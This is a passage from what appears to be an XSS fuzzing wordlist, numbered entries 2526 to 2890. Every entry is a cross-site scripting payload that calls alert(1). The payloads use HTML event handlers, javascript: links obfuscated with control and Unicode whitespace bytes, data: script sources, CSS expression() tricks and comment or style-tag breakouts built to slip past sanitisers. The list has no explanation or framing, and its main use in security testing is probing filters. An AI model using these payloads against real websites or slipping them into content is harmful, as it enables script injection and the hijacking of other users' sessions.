  2526. <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  2527. "><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  2528. '><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
  2529. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  2530. "><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  2531. '><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
  2532. <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  2533. "><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  2534. '><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
  2535. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  2536. "><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  2537. '><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
  2538. <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  2539. "><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  2540. '><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
  2541. <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  2542. "><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  2543. '><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
  2544. <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  2545. "><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  2546. '><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
  2547. <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  2548. "><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  2549. '><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
  2550. <object onError object onError="javascript:javascript:alert(1)"></object onError>
  2551. "><object onError object onError="javascript:javascript:alert(1)"></object onError>
  2552. '><object onError object onError="javascript:javascript:alert(1)"></object onError>
  2553. <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  2554. "><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  2555. '><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
  2556. <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  2557. "><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  2558. '><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
  2559. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  2560. "><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  2561. '><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
  2562. <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  2563. "><body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  2564. '><body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
  2565. <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  2566. "><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  2567. '><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
  2568. <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  2569. "><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  2570. '><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
  2571. <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  2572. "><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  2573. '><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
  2574. <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  2575. "><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  2576. '><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
  2577. <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  2578. "><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  2579. '><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
  2580. <body onload body onload="javascript:javascript:alert(1)"></body onload>
  2581. "><body onload body onload="javascript:javascript:alert(1)"></body onload>
  2582. '><body onload body onload="javascript:javascript:alert(1)"></body onload>
  2583. <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  2584. "><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  2585. '><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
  2586. <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  2587. "><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  2588. '><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
  2589. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  2590. "><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  2591. '><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
  2592. <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  2593. "><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  2594. '><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
  2595. <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  2596. "><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  2597. '><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
  2598. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  2599. "><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  2600. '><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
  2601. <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  2602. "><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  2603. '><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
  2604. <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  2605. "><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  2606. '><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
  2607. <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  2608. "><html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  2609. '><html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
  2610. <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  2611. "><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  2612. '><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
  2613. \x3Cscript>javascript:alert(1)</script>
  2614. '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
  2615. <script>javascript:alert(1)</script\x0D
  2616. "><script>javascript:alert(1)</script\x0D
  2617. '><script>javascript:alert(1)</script\x0D
  2618. <script>javascript:alert(1)</script\x0A
  2619. "><script>javascript:alert(1)</script\x0A
  2620. '><script>javascript:alert(1)</script\x0A
  2621. <script>javascript:alert(1)</script\x0B
  2622. "><script>javascript:alert(1)</script\x0B
  2623. '><script>javascript:alert(1)</script\x0B
  2624. <script charset="\x22>javascript:alert(1)</script>
  2625. "><script charset="\x22>javascript:alert(1)</script>
  2626. '><script charset="\x22>javascript:alert(1)</script>
  2627. <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  2628. "><!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  2629. '><!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
  2630. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
  2631. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
  2632. --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
  2633. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
  2634. `"'><img src='#\x27 onerror=javascript:alert(1)>
  2635. <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  2636. "><a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  2637. '><a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
  2638. "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
  2639. <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2640. "><a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2641. '><a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2642. <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2643. "><a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2644. '><a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2645. <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2646. "><a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2647. '><a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2648. <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  2649. "><a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  2650. '><a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
  2651. <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2652. "><a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2653. '><a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2654. <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2655. "><a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2656. '><a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2657. <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2658. "><a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2659. '><a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2660. <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2661. "><a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2662. '><a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2663. <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2664. "><a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2665. '><a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2666. <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2667. "><a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2668. '><a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2669. <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2670. "><a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2671. '><a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
  2672. <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2673. "><a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2674. '><a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2675. <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2676. "><a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2677. '><a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
  2678. <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  2679. "><a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  2680. '><a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
  2681. <script>/* *\x2A/javascript:alert(1)// */</script>
  2682. "><script>/* *\x2A/javascript:alert(1)// */</script>
  2683. '><script>/* *\x2A/javascript:alert(1)// */</script>
  2684. <script>/* *\x00/javascript:alert(1)// */</script>
  2685. "><script>/* *\x00/javascript:alert(1)// */</script>
  2686. '><script>/* *\x00/javascript:alert(1)// */</script>
  2687. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  2688. "><style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  2689. '><style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
  2690. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  2691. "><style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  2692. '><style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
  2693. <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  2694. "><style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  2695. '><style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
  2696. <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  2697. "><style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  2698. '><style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
  2699. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  2700. "><style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  2701. '><style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
  2702. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
  2703. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
  2704. <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  2705. "><script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  2706. '><script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
  2707. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  2708. "><script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  2709. '><script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
  2710. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  2711. "><script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  2712. '><script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
  2713. '`"><\x3Cscript>javascript:alert(1)</script>
  2714. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  2715. "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
  2716. <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  2717. "><script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  2718. '><script src="data:text/plain\x2Cjavascript:alert(1)"></script>
  2719. <script src="data:\xD4\x8F,javascript:alert(1)"></script>
  2720. "><script src="data:\xD4\x8F,javascript:alert(1)"></script>
  2721. '><script src="data:\xD4\x8F,javascript:alert(1)"></script>
  2722. <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  2723. "><script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  2724. '><script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
  2725. <script src="data:\xCB\x8F,javascript:alert(1)"></script>
  2726. "><script src="data:\xCB\x8F,javascript:alert(1)"></script>
  2727. '><script src="data:\xCB\x8F,javascript:alert(1)"></script>
  2728. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  2729. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  2730. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  2731. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  2732. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  2733. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  2734. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  2735. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  2736. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  2737. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  2738. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  2739. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  2740. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  2741. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  2742. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  2743. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
  2744. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  2745. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  2746. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  2747. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  2748. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  2749. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  2750. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  2751. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  2752. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  2753. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  2754. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  2755. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2756. "><a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2757. '><a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2758. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2759. "><a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2760. '><a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2761. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2762. "><a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2763. '><a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2764. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2765. "><a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2766. '><a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2767. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2768. "><a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2769. '><a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2770. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2771. "><a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2772. '><a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2773. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2774. "><a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2775. '><a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2776. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2777. "><a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2778. '><a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2779. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2780. "><a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2781. '><a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2782. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2783. "><a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2784. '><a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2785. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2786. "><a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2787. '><a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2788. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2789. "><a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2790. '><a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2791. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2792. "><a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2793. '><a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2794. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2795. "><a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2796. '><a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2797. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2798. "><a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2799. '><a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2800. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2801. "><a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2802. '><a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2803. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2804. "><a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2805. '><a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2806. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2807. "><a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2808. '><a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2809. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2810. "><a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2811. '><a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2812. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2813. "><a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2814. '><a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2815. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2816. "><a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2817. '><a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2818. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2819. "><a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2820. '><a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2821. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2822. "><a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2823. '><a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2824. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2825. "><a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2826. '><a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2827. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2828. "><a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2829. '><a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2830. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2831. "><a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2832. '><a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2833. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2834. "><a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2835. '><a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2836. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2837. "><a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2838. '><a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2839. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2840. "><a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2841. '><a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2842. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2843. "><a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2844. '><a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2845. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2846. "><a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2847. '><a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2848. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2849. "><a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2850. '><a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2851. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2852. "><a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2853. '><a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2854. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2855. "><a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2856. '><a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2857. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2858. "><a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2859. '><a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2860. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2861. "><a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2862. '><a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2863. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2864. "><a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2865. '><a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2866. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2867. "><a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2868. '><a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2869. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2870. "><a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2871. '><a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2872. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2873. "><a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2874. '><a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2875. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2876. "><a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2877. '><a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2878. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2879. "><a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2880. '><a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2881. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2882. "><a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2883. '><a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2884. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2885. "><a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2886. '><a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2887. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2888. "><a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2889. '><a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  2890. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
